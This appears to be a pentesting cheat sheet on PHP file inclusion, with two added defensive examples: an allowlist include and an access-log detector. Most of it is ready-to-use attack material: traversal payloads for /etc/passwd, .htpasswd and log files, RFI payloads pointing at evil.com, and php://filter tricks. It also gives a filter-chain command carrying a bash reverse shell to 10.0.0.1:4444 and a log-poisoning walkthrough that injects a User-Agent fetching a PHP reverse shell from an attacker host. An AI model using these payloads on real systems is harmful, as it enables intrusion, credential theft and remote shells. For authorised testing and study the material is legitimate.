FILE INCLUSION (LFI/RFI)

The intent of this document is to help penetration testers and students identify and test LFI vulnerabilities on future penetration testing engagements by consolidating research on local file inclusion (LFI) testing techniques. LFI vulnerabilities are typically discovered during web app pen tests using the techniques contained within this document. Additionally, some of the techniques mentioned in this paper are also commonly used in CTF-style competitions.

Local File Inclusion (LFI) and Remote File Inclusion (RFI) are vulnerabilities that are often found to affect web applications that rely on a scripting run time.

Local File Inclusion (LFI)

Payload

?page=../
?page=/etc/passwd
?page=../../../../etc/passwd
?page=../../../../../etc/passwd
?page=..//..//..//..//..//etc/passwd
?page=....//....//....//....//etc/passwd
?page=....//....//....//....//....//....//etc/passwd
?page=../../../../../../../../../../../../../../etc/passwd
?page=..\/..\/..\/..\/etc/passwd
?page=..%2F..%2F..%2F..%2Fetc/passwd
?page=..%5C..%5C..%5C..%5cetc/passwd
?page=..%252f..%252f..%252f..%252fetc/passwd
?page=/etc/passwd&
?page=/etc/passwd%00
?page=/etc/passwd%00.inc
?page=/etc/passwd%00.php
?page=http://localhost/index
?page=http:%5c%5cindex
?page=http:%252f%252findex
?page=somedir/../../../../etc/passwd&ext=

# File scheme
?page=file:///etc/passwd
?page=file:%2F%2F%2Fetc%2Fpasswd
?page=file:%252F%252F%252Fetc%252Fpasswd
?page=file%3A///etc/passwd
?page=file%3A%2F%2F%2Fetc%2Fpasswd
?page=file%3A%252F%252F%252Fetc%252Fpasswd
?page=file://var/www/html/index.php
?page=file://var/www/<subdomain>/index.php

# Host
?page=/etc/hosts
# Cron
?page=/etc/crontab

# Web root
?page=/var/www/html/index.html
?page=/var/www/html/index.php
?page=/var/www/example.com/index.php
?page=/var/www/subdomain/index.php
?page=/var/www/wordpress/index.php

# Apache
?page=/etc/apache2/sites-enabled/000-default.conf
?page=/etc/apache2/sites-enabled/domain.conf
?page=/etc/apache2/sites-enabled/example.com.conf
?page=/etc/apache2/sites-enabled/sub.example.com.conf
?page=/etc/apache2/sites-enabled/sub.conf
?page=/etc/apache2/sites-available/domain.conf
?page=/etc/apache2/sites-available/example.com.conf
?page=/etc/apache2/sites-available/sub.example.com.conf
?page=/etc/apache2/sites-available/sub.conf
?page=/etc/apache2/.htpasswd
?page=/var/log/apache/access.log
?page=/var/log/apache/error.log
?page=/var/log/apache2/access.log
?page=/var/log/apache2/error.log

# Nginx
?page=/var/log/nginx/access.log
?page=/var/log/nginx/error.log
?page=/etc/nginx/nginx.conf
?page=/etc/nginx/conf.d/.htpasswd
?page=/etc/nginx/sites-available/example.com.conf
?page=/etc/nginx/sites-enabled/example.com.conf
?page=/usr/local/nginx/conf/nginx.conf
?page=/usr/local/etc/nginx/nginx.conf

# PHP web conf
?page=/etc/php/x.x/apache2/php.ini
?page=/etc/php/x.x/cli/php.ini
?page=/etc/php/x.x/fpm/php.ini

# PHP Filter
?page=php://filter/resource=/etc/passwd
?page=php://filter/read=string.rot13/resource=index.php
?page=php://filter/convert.base64-encode/resource=index.php
?page=pHp://filter/convert.base64-encode/resource=index.php
?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>

# Windows
?page=../../../../../../../../windows/system32/drivers/etc/hosts
?page=C:/Windows/System32/drivers/etc/hosts
?page=C:/Users/Public/Desktop/desktop.ini
?page=C:/Users/FUZZ/Desktop/desktop.ini # user enumeration
?page=C:/inetpub/wwwroot/
?page=C:/xampp/apache/conf/httpd.conf
?page=C:/xampp/apache/conf/extra/httpd-userdir.conf
?page=C:/xampp/apache/conf/extra/httpd-vhosts.conf
?page=C:/xampp/apache/conf/extra/httpd-xampp.conf
?page=C:/xampp/apache/conf/extra/httpd-ajp.conf
?page=C:/xampp/apache/logs/access.log
?page=C:/xampp/apache/logs/error.log
?page=C:/xampp/cgi-bin/example.cgi
?page=C:/xampp/htdocs/example.com/index.php
?page=C:/xampp/htdocs/sub.example.com/index.php
?page=C:/xampp/phpMyAdmin/index.php
?page=C:/xampp/phpMyAdmin/config.inc.php

Automation

ffuf -u http://example.com/?page=FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
ffuf -u http://example.com/?page=FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt

As with many exploits, remote and local file inclusion is in the end a problem in how the code is written. Of course, it also takes a second person to exploit it. This article will hopefully give you an idea of how to protect your website, and most importantly your code, from a file inclusion exploit. I'll give code examples in PHP.

Let’s look at some of the code that makes RFI / LFI exploits possible.

<a href="index.php?page=file1.php">Files</a>
<?php
// Vulnerable: the user-supplied "page" parameter reaches include() unchecked
$page = $_GET['page'];
include($page);
?>
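
A hardened counterpart to the snippet above, as an added example that is not from the original post: the page parameter is treated as a key into a fixed allowlist, so no user-controlled string ever reaches include. The page keys (home, files), the pages/ directory and the resolve_page helper are assumptions made for illustration.

```php
<?php
// Added example (not from the original post). Requires PHP 8.
// Assumed layout: templates live in ./pages/ next to this script;
// the page keys below are hypothetical.
declare(strict_types=1);

const PAGE_DIR = __DIR__ . '/pages';

// Fixed allowlist: request value => file name on disk.
const PAGES = [
    'home'  => 'home.php',
    'files' => 'file1.php',
];

/**
 * Map a user-supplied page key to an absolute path, or return null.
 * Traversal sequences, encoded separators, null bytes and stream wrappers
 * (php://, file://, data://, http://) never match a key, so they are
 * rejected without any filtering or decoding logic.
 */
function resolve_page(mixed $key): ?string
{
    if (!is_string($key) || !array_key_exists($key, PAGES)) {
        return null;
    }
    // Defence in depth: resolve symlinks and confirm the file is still
    // inside PAGE_DIR before handing it to include.
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$key]);
    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

$path = resolve_page($_GET['page'] ?? 'home');
if ($path === null) {
    http_response_code(404);
    exit('Page not found');
}
include $path;
```

Keeping allow_url_include = Off (the PHP default) and setting open_basedir in php.ini limits what an include that slips past review can reach.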

Remote File Inclusion (RFI)

Payload

?page=//evil.com/exploit
?page=%2F%2fevil.com/exploit
?page=%2C%2Cevil.com/exploit
?page=http://evil.com/exploit
?page=http%3A//evil.com/exploit
?page=http%3A%2F%2Fevil%2Ecom/exploit
?page=http%253A%252F%252Fevil%252Ecom/
?page=test@sub.example.com/

LFI / RFI using wrappers

  • Wrapper php://filter

The php://filter part is case-insensitive.

http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php

Remote Code Execution (RCE)

php_filter_chain_generator is a CLI tool that generates a payload for PHP filter bypass and allows us to achieve RCE. Below is the payload for a reverse shell.

  • https://github.com/synacktiv/php_filter_chain_generator
wget https://raw.githubusercontent.com/synacktiv/php_filter_chain_generator/main/php_filter_chain_generator.py
python3 php_filter_chain_generator.py --chain "<?php system('bash -c \"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1\"')?>"

Then copy the output and paste it to the target.

Log Poisoning

  1. Check if You Can Access the Apache Log File
# Debian, Ubuntu Linux
/?page=/var/log/apache/access.log
/?page=../../../../var/log/apache/access.log
/?page=/var/log/apache2/access.log
/?page=../../../../var/log/apache2/access.log

# FreeBSD
/?page=/var/log/httpd-access.log
/?page=../../../../var/log/httpd-access.log

# CentOS, Fedora, RedHat Linux
/?page=/var/log/httpd/access_log
/?page=../../../../var/log/httpd/access_log
  2. Prepare the Payload for PHP Reverse Shell
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php

# Edit the values in the payload
$ip = '<attacker-ip>';
$port = 4444;
  3. Open Web Server in Local Machine
python -m http.server 80
  4. Inject PHP Payload in the User-Agent

Send the GET request with the payload placed in the User-Agent header.

The payload can be uploaded to the /shell.php of the target website.

GET / HTTP/1.1
...
User-Agent: <?php file_put_contents('shell.php', file_get_contents('http://<attacker-ip>/shell.php'));  ?>
  5. Apply the Injection
Refresh the page /index.php?page=../../../../var/log/apache2/access.log
  6. Open Listener for Reverse Shell

On your local machine, open the listener. Specify the port that you set in step 2.

nc -lvnp 4444
  7. Gain Access to Shell

Access /shell.php on the target website. If it goes well, you can get a shell.
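
The detection side of the requests on this page, as an added example that is not from the original post: a PHP CLI script that flags access-log lines carrying traversal sequences, stream wrappers, null bytes, or a PHP tag in the User-Agent (the log-poisoning step). The function name lfi_findings, the indicator names and the sample log lines are constructed for illustration; the Apache/Nginx combined log format is assumed.

```php
<?php
// Added example (not from the original post). Assumes the Apache/Nginx
// "combined" log format and PHP 8; the sample lines are constructed.
declare(strict_types=1);

/** Return the file-inclusion indicators found in one access-log line. */
function lfi_findings(string $line): array
{
    // combined: ... "METHOD URI PROTO" status bytes "referer" "user-agent"
    if (!preg_match('/"[A-Z]+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "(.*)"$/', rtrim($line), $m)) {
        return [];
    }
    [, $uri, $agent] = $m;

    // Decode repeatedly so %2F, %252F and %5C all normalise to a separator.
    for ($i = 0; $i < 3; $i++) {
        $decoded = rawurldecode($uri);
        if ($decoded === $uri) {
            break;
        }
        $uri = $decoded;
    }
    $uri = str_replace('\\', '/', $uri);

    $hits = [];
    if (str_contains($uri, '../')) {
        $hits[] = 'traversal';
    }
    if (preg_match('#[?&][^=&]*=(php|file|data|https?|ftp)://#i', $uri)) {
        $hits[] = 'stream-wrapper';
    }
    if (str_contains($uri, "\0")) {
        $hits[] = 'null-byte';
    }
    if (str_contains($agent, '<?')) {
        $hits[] = 'php-tag-in-user-agent';   // log-poisoning attempt
    }
    return $hits;
}

$sample = [ // constructed log lines
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=..%252f..%252fetc/passwd%00 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=pHp://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 2048 "-" "curl/8.0"',
    '203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php echo 1; ?>"',
];
foreach ($sample as $line) {
    echo implode(',', lfi_findings($line)) ?: 'clean', "\n";
}
```

A hit on php-tag-in-user-agent followed by a request that includes the access log itself is the sequence to alert on, since that pairing is what turns a file read into code execution.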

Disclaimer

Exploit Notes are only for educational purposes or penetration testing, not for attacking servers that you are not authorized to test. This site will not take any responsibility even if you attack a server illegally or cause damage unintentionally. Please use the contents of this site at your own risk.
The contents of this site are not original; they are based on information on the internet that the author actually tried and found to work. Although the author strives to post the latest information on this site as much as possible, there is no guarantee that it will always be new.
This post is licensed under CC BY 4.0 by the author.